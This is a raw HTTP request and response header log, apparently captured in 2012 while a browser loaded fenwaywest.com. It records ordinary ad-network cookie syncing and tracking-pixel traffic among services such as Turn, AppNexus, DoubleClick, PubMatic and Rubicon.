Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739..0.0.1353298658421|537583..0.0.1353298658421|547259..0.0.1353298658421
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-5-121
Date: Mon, 19 Nov 2012 04:17:40 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:41 GMT; Path=/ pb_rtb_ev=2-535461..0.0.1353298658421|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:41 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /icon/box_77_top-right.png HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Server: Apache
Etag: &quot;654f83799ff951d2ecbceaebd00f64ee:1347294346&quot;
Last-Modified: Mon, 10 Sep 2012 16:25:46 GMT
Accept-Ranges: bytes
Content-Length: 1082
Cache-Control: max-age=2144448000
Date: Mon, 19 Nov 2012 04:17:41 GMT
Connection: keep-alive
GET /icon/c_30_us.png HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Server: Apache
Etag: &quot;30b41b24c3666e9f0ca5ed8d93fe35e8:1347294352&quot;
Last-Modified: Mon, 10 Sep 2012 16:25:52 GMT
Accept-Ranges: bytes
Content-Length: 1951
Cache-Control: max-age=2144448000
Date: Mon, 19 Nov 2012 04:17:41 GMT
Connection: keep-alive
GET /a/l/n/412/890/us/2da922e9-2c05-411e-8726-b08ddbaca578.png HTTP/1.1

Host: c.betrad.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Server: Apache
Etag: &quot;e170a772523f6c1efa47da5b02003ae2:1332874160&quot;
Last-Modified: Tue, 27 Mar 2012 18:49:20 GMT
Accept-Ranges: bytes
Content-Length: 4744
Cache-Control: max-age=2144448000
Date: Mon, 19 Nov 2012 04:17:41 GMT
Connection: keep-alive
GET /server/ddc.htm?uid=4608069794370173199&rnd=4536012200332245263&fpid=12&nu=y&t=&sp=n&purl=&ctid=3&cyid=11 HTTP/1.1

Host: cdn.turn.com
GET /server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.turn.com/server/pixel.htm?fpid=12
Cookie: uid=4608069794370173199
HTTP/1.1 200 OK

Content-Type: text/html;charset=UTF-8
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Pragma: no-cache
Content-Encoding: gzip
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 4145
Connection: keep-alive
Vary: Accept-Encoding
GET /gmatcher?google_gid=CAESEE5Cd4RhtyLOx5zauejuLUM&google_cver=1 HTTP/1.1

Host: g-pixel.invitemedia.com
GET /gmatcher?google_gid=CAESEE5Cd4RhtyLOx5zauejuLUM&amp;google_cver=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4377&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh250.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=F47478FD-881F-434F-8330-33022F73830C&amp;us_id=5543&amp;invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pub_line_item_id=87821&amp;mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711; dp_rec=&quot;{\&quot;4\&quot;:1353298658}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHi6dNlrawKjBpPO9a0showWoD5AKFUC1E=&quot;; impressions_p1=&quot;eJzjcuRgF1JxMzE3Mbdwc9G1sDB00zUxNnHTtTA2NtAFYiMjN3NjC2MDZ4mnT5e1siq0/ynQmPWbw6B3HavFcu2InoeMAA+dE2s=&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHi6dNlrawKjBpPO9a0showWoD5AKNjC2U=&quot;
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:41 GMT
Set-Cookie: exchange_uid=&quot;eyI0IjpbIkNBRVNFRTVDZDRSaHR5TE94NXphdWVqdUxVTSIsNzM0ODI2XX0=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:17:41 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /templates/yoo_bigeasy/images/module_icons_white.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/modules.css
Cookie: __qca=P0-1109205847-1353298656085; cto_rtt=; UnicaNIODID=iYQ8T442WFr-XzLhPSG; __utma=54302783.757114296.1353298659.1353298659.1353298659.1; __utmb=54302783.1.9.1353298659; __utmc=54302783; __utmz=54302783.1353298659.1.1.utmcsr=88websitedesign.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:20:02 GMT
Etag: &quot;eccb30-2d2-4c38759d56080&quot;
Accept-Ranges: bytes
Content-Length: 722
Keep-Alive: timeout=5, max=493
Connection: Keep-Alive
GET /set_partner_uid?partnerID=84&partnerUID=upEfUI6599OKrvkx&sscs_active=1 HTTP/1.1

Host: segment-pixel.invitemedia.com
GET /set_partner_uid?partnerID=84&amp;partnerUID=upEfUI6599OKrvkx&amp;sscs_active=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711; dp_rec=&quot;{\&quot;4\&quot;:1353298658}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHi6dNlrawKjBpPO9a0showWoD5AKFUC1E=&quot;; impressions_p1=&quot;eJzjcuRgF1JxMzE3Mbdwc9G1sDB00zUxNnHTtTA2NtAFYiMjN3NjC2MDZ4mnT5e1siq0/ynQmPWbw6B3HavFcu2InoeMAA+dE2s=&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHi6dNlrawKjBpPO9a0showWoD5AKNjC2U=&quot;
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:16:46 GMT
Set-Cookie: partnerUID=&quot;eyI4NCI6WyJ1cEVmVUk2NTk5T0tydmt4Iix0cnVlXX0=&quot;;Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:16:46 GMT;Max-Age=31536000 impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1

Host: i.w55c.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=89666ae3-c1ef-41a0-bdf0-7a374e556a82;Path=/;Domain=.w55c.net;Expires=Wed, 19-Nov-14 04:17:41 GMT
X-Version: DataXu Pixel Tracker v3.3 20120918
Cache-Control: private
P3P: policyref=&quot;https://cts.w55c.net/ct/p3p_policy_ref.xml&quot;, CP=&quot;UNI PUR COM INT STA OTC STP OUR CUR TAIo COR DSP NOI&quot;
Content-Length: 0
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=535039&amp;ev=89666ae3-c1ef-41a0-bdf0-7a374e556a82
Via: 1.1 lhr032172010000 (MII-APC/2.2)
Keep-Alive: timeout=2
Connection: Keep-Alive
GET /imp?anmember=514&anprice=40&Z=160x600&s=653070&r=0&_salt=1488817&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0786.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: testbounce=testing; path=/
Location: http://ad.yieldmanager.com/imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:41 GMT
Expires: Mon, 19 Nov 2012 04:17:41 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /ct/0_0_BQDGKMYTZBBJNGPJAOOVU7$underscore$XERC7SMQKFB2FO6VTX75I5$underscore$g_890/no/0/1/0/0/0/0/160/600/242/412/0/pixel.gif?v=811&ttid=2&d=fenwaywest.com&r=0.21682278600883187 HTTP/1.1

Host: l.betrad.com
GET /ct/0_0_BQDGKMYTZBBJNGPJAOOVU7$underscore$XERC7SMQKFB2FO6VTX75I5$underscore$g_890/no/0/1/0/0/0/0/160/600/242/412/0/pixel.gif?v=811&amp;ttid=2&amp;d=fenwaywest.com&amp;r=0.21682278600883187 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Connection: keep-alive
GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1

Host: ib.adnxs.com
GET /getuid?http://r.turn.com/r/bd?ddc=1&amp;pid=54&amp;cver=1&amp;uid=$UID HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjKn-qjm'; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgBIAEoATDi5aaFBRDi5aaFBRgB; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:41 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:41 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&amp;pid=54&amp;cver=1&amp;uid=5858721859426781856
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 0
GET /pixel?google_nid=turn1&google_cm&google_sc&google_hm=NDYwODA2OTc5NDM3MDE3MzE5OQ== HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=turn1&amp;google_cm&amp;google_sc&amp;google_hm=NDYwODA2OTc5NDM3MDE3MzE5OQ== HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/18/uid/?google_gid=CAESED7yEyqvwHaZ756lIOe7tfw&amp;google_cver=1
Date: Mon, 19 Nov 2012 04:17:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 300
X-XSS-Protection: 1; mode=block
GET /match?admeld_adprovider_id=24&external_user_id=4608069794370173199 HTTP/1.1

Host: tag.admeld.com
GET /match?admeld_adprovider_id=24&amp;external_user_id=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: meld_sess=bbeaaa1b-8eda-4510-8721-df07b3f95b13
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
P3P: policyref=&quot;http://tag.admeld.com/w3c/p3p.xml&quot;, CP=&quot;PSAo PSDo OUR SAM OTR BUS DSP ALL COR&quot;
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:41 GMT
Connection: keep-alive
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:4608069794370173199 HTTP/1.1

Host: image2.pubmatic.com
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&amp;piggybackCookie=pcv:1|uid:4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:; KTPCACOOKIE=YES; DPPIX_ON=YES; SYNCUPPIX_ON=YES; KRTBCOOKIE_80=1336-db273952-68a4-4097-8df2-7d98b16e5711.; PUBRETARGET=390_1361074657; _curtime=1353298658; pubfreq_28597_24363_1615290777=243-1
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_22=488-pcv:1|uid:4608069794370173199; domain=pubmatic.com; expires=Wed, 19-Nov-2014 04:17:41 GMT; path=/ PUBRETARGET=390_1361074657.82_1447906661; domain=pubmatic.com; expires=Thu, 19-Nov-2015 04:17:41 GMT; path=/
Content-Length: 1
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Connection: close
GET /tap.php?v=4212&nid=1185&put=4608069794370173199&expires=60 HTTP/1.1

Host: pixel.rubiconproject.com
GET /tap.php?v=4212&amp;nid=1185&amp;put=4608069794370173199&amp;expires=60 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Set-Cookie: rpb=4212%3D1; expires=Wed, 19-Dec-2012 04:17:41 GMT; path=/; domain=.rubiconproject.com rpx=4212%3D25268%2C0%2C1%2C%2C; expires=Wed, 19-Dec-2012 04:17:41 GMT; path=/; domain=.pixel.rubiconproject.com put_1185=4608069794370173199; expires=Fri, 18-Jan-2013 04:17:41 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Keep-Alive: timeout=30, max=9614
Connection: Keep-Alive
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=4608069794370173199 HTTP/1.1

Host: r.openx.net
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=4608069794370173199 HTTP/1.1

